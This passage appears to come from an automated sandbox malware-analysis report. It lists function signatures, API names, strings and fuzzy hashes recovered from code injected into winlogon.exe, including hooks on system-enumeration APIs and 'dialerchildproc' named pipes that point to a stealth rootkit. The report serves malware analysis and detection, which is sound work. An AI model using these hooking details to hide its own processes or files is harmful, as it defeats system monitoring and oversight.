                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
                                                                                • Instruction ID: 038cc99b61fe1a58f79dc842e8ffe6d2d7c0790616e2838ebdfb41b054369831
                                                                                • Opcode Fuzzy Hash: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
                                                                                • Instruction Fuzzy Hash:

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                • String ID: d
                                                                                • API String ID: 2005889112-2564639436
                                                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction ID: aeb95de4f42054a2f3f95a2b872bf4f2243f0c658a77d544ea9ad6ad2c1c143a
                                                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                • Instruction Fuzzy Hash: 58518D72244B89D3EB14CF63E54839AB7B1F789BC1F05812ADA4A47B15DF38C496CB20

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                • API String ID: 4175298099-1975688563
                                                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction ID: 8cce2f1a17bd9a47a59a043041d4b8e8b5a8303ea1d5e03b2a23537e3786b7a4
                                                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                • Instruction Fuzzy Hash: 8731C268280ACBE0EB04EF67E9596D43321B744384F87551B950992167AF388AC9CBB2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction ID: 53bdd41ac6b1d8d54737249bc52a119373122e5eeb4dbf41134d301e03b5d5e4
                                                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                • Instruction Fuzzy Hash: 9A217135754B8583FB10CB26E40835977A1F389BE4F51421ADA5D42BA9CF3CC589CF21
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction ID: 8f8b1e4e2d489b3ebf195f3dd781b4f22cd6ba0354d6cfda7ca4a4e081beaad5
                                                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                                                • Instruction Fuzzy Hash: E0418C33214BC1D7E7648F62E44839AB7A1F389B85F01812ADB8A47B59DF38C5A4CB10
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 286d5c8e7f6a6ca339d99bbb7d6dcee694a4070d76ebb3cc219e36735a09aa4a
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 7C81D3216C02C3A6FA54AB27D4C935966D0F785780FD640AFBA1947797DB38C9C68F30
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 53fcbbc3d2a3e370178729f48bdfe8c921b2a15122ac105cd4e536dc3953e0b9
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 7381A2616822C386FB60AB27E44939962A0F755780F96482FBE0543797DB38C9C78F30
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction ID: 60312374366c341bdeb66b744369ff18c4e017edde39ec245524e073ca5c3d56
                                                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                • Instruction Fuzzy Hash: 0D81E4207D43C7A6FB509B2BE84D3692291B745780F8A441F9A4887797DB38C8C5CF31
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction ID: d7ff3d212e4310c3368abd7f8598e6958ee0b0ec7f7d81cda9a40661fe3de822
                                                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                • Instruction Fuzzy Hash: 4331A631392BD291FE159B03E4087A963A4B749BA0F5B052EDD2D4B386DF38D4C5CB20
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction ID: af28d6c988de902296c6bed468f3d3ecf701edbb6641ab2850be54f418a0f1ad
                                                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                • Instruction Fuzzy Hash: 5F11BF21354F8186E7508B43E85C31972A1F388FE4F05022AEA5EC7796DF78C988CB61
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction ID: cc620110a51a58dd70edbd7c37a0e2fb6e7be8ddb1bfead4c1becedaa8ec603b
                                                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                • Instruction Fuzzy Hash: 5831A621741F9682EB55DF67E84866973B0FB44BC4F06402A9E4947B66EF38C8E1CB70
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction ID: 4d08f418929920b4e8b1735536e92d9e373c27977508908f1483ba05dee0d63d
                                                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                • Instruction Fuzzy Hash: 4A015721340A8696EA14DB13E85835963A1F788FD1F49803ACE8E83756DF38C9C9CB60
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction ID: d61940c0ec6f7cf42cd69532e0be27823bb6057274f353414079f4d0b405efc5
                                                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                • Instruction Fuzzy Hash: D3112D65751B8686FB249B23E41D71667A1BB48B85F05042ECD4D87766EF3CC488CF31
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction ID: ace2962ad30fa323b0aad9357b7a9f552d46174ff27360a27e755925f39c32bd
                                                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                • Instruction Fuzzy Hash: 5751AE323556928AEB14CF26E44CB693795F344BD8F52812ADE1A4778AEB75CC81CB20
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction ID: 17dde31f65c8a099198bc7b4df53dd6c50603f47b852e73b7a0a4bcd5db8d376
                                                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                • Instruction Fuzzy Hash: 91F04F223446C692EB208B22F5983596761F744BD9F85802ACA4D8A956DF3DC6CCCF20
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction ID: 864e42a3574307904fc1d857d0a4859218df6f1e63948cc20cc97121c544bdde
                                                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                • Instruction Fuzzy Hash: 27F08220348BC691EA008B13F9081196220BB48FD0F09813BDE5A87B2ACF3CC5C1CB21
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction ID: 010840aab30206d9dde1e5c38ccd121aa0ffac0a021a8112b734b15917e30bc3
                                                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                • Instruction Fuzzy Hash: C9F0FE613656C691EB554B62E8983652760BB48BD0F46202F951F85667DF38C8CCCF31
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 2210144848-0
                                                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction ID: d91a74972d3addb8ca59853685c5d2fbb860ea84511e9225b42e499cef52e57b
                                                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                • Instruction Fuzzy Hash: 2881A4226906D689F7509F66D8483AD27A1F744BC4F46421FDE0AD3B9BDB3484C5CB32
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 391bdceae7d8abe40659ce668f338d58b4ab221fc177ec12fd98c8e388539aa3
                                                                                • Instruction ID: 6ba39a3f7beec29c8b45d62e6135430484392ab18ebf7e837b9564d638d1a982
                                                                                • Opcode Fuzzy Hash: 391bdceae7d8abe40659ce668f338d58b4ab221fc177ec12fd98c8e388539aa3
                                                                                • Instruction Fuzzy Hash: B161BA36559BC5C6E7608B16E45831EB7A0F388794F52011AEACD87BA9DB7CC980CF50
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: ed2b934100f97afa977e39f1fd6ac49cf20b2c536a150e52cfc2945855d0b986
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: C61140226C4EC301FB541167E45D36900A0BB54376F4B463FEA7F06BE78E184DEA4930
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 14295e7fc7057082f756038696b181797a2604b88226c85cc6d8bcc6c0bd7719
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: C3117362AD4A9301F6641167F55E36913817B54374F4B463EAA7706BDF8E288FC34930
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction ID: 11befe631739a896dde1201fc855ba315837a2f3c6c9f2ca9294bb3b0ddd3fe6
                                                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                • Instruction Fuzzy Hash: 1111A322AD9A8301F6981166E46E3AD21507BF43F4F07463EEA77867E78B548CC14A22
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1452528299-0
                                                                                • Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction ID: d2b575e9bd7aec25d60299338e0f481a2a7986a84132ba62cfa286d4e1bd523b
                                                                                • Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
                                                                                • Instruction Fuzzy Hash: C6117F202A52C382FE149727E84C3752291BB847E0F0A462ED966573DBDB38C8C6CE30
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 536bb603fbe19da4021b5d9ed336ddfc109c4d0459fb01cd42cf425b880ebbff
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: 5151B2327526828BFB14DF17E488B193395F340B98F62816BDA1A4778ADB34C9C1CB24
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction ID: 8085851e88a6e7281abd615f9640dd0b36aa95edc266ba20189aaac5d140ce3c
                                                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                • Instruction Fuzzy Hash: 2951B5323536828AD724CF17E448B1833D5F354B98F52892ADA464774AD736C9C2CF24
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: 8c9fbcc44401d53b7cee33deabdd09b265d515de1b2020a9f8bd5eb34ed83011
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: 0531A27125168287F714DF13E88871937A4F740BD8F26805FAE5A0774ACB38C981CB24
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction ID: 22b79d110ea7db6a52cfccea508c33ed5550232c45d3a439089f2dac9a8f1e29
                                                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                • Instruction Fuzzy Hash: 5A31B67225278186E714DF13E84871937D4F750BD8F26841EEE574774ACB3ACA82CB64
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction ID: ea355e91a04b901e72b3f74cb420232f01c1460e508f98bf1fb30d8e3dd39035
                                                                                • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                • Instruction Fuzzy Hash: 9C111832655F89D2EB589F67E84821A7770F78AB84F05402AEB8E53716DF38C091CB61
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction ID: d7e6de7e2a15e02e03db9e345b7c4e2d2ee15705448f3fbc566941e3b102550c
                                                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                • Instruction Fuzzy Hash: 0C71A2322847C286EB649F67D9483AA67A0F744BC4F46001FDD4957B9ADF35CA84CB60
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction ID: e46a457bda775b18bb9ebc57d715825d724901b28845aabb4b9f333315636edb
                                                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                • Instruction Fuzzy Hash: 2C51C3263987C2C2E6649A2BE55C36A6691F385780F16002FD98A43FABCF35C4858F70
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction ID: 35b4963ba83091f15b9151213f3c930b53f3aee8ecac79b1adcd3abd4d7943bc
                                                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                • Instruction Fuzzy Hash: C941A372314A8181EB209F26E44839A77A1F7987C4F52402AEE4DC7799EB3CC585CF61
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Stringtry_get_function
                                                                                • String ID: LCMapStringEx
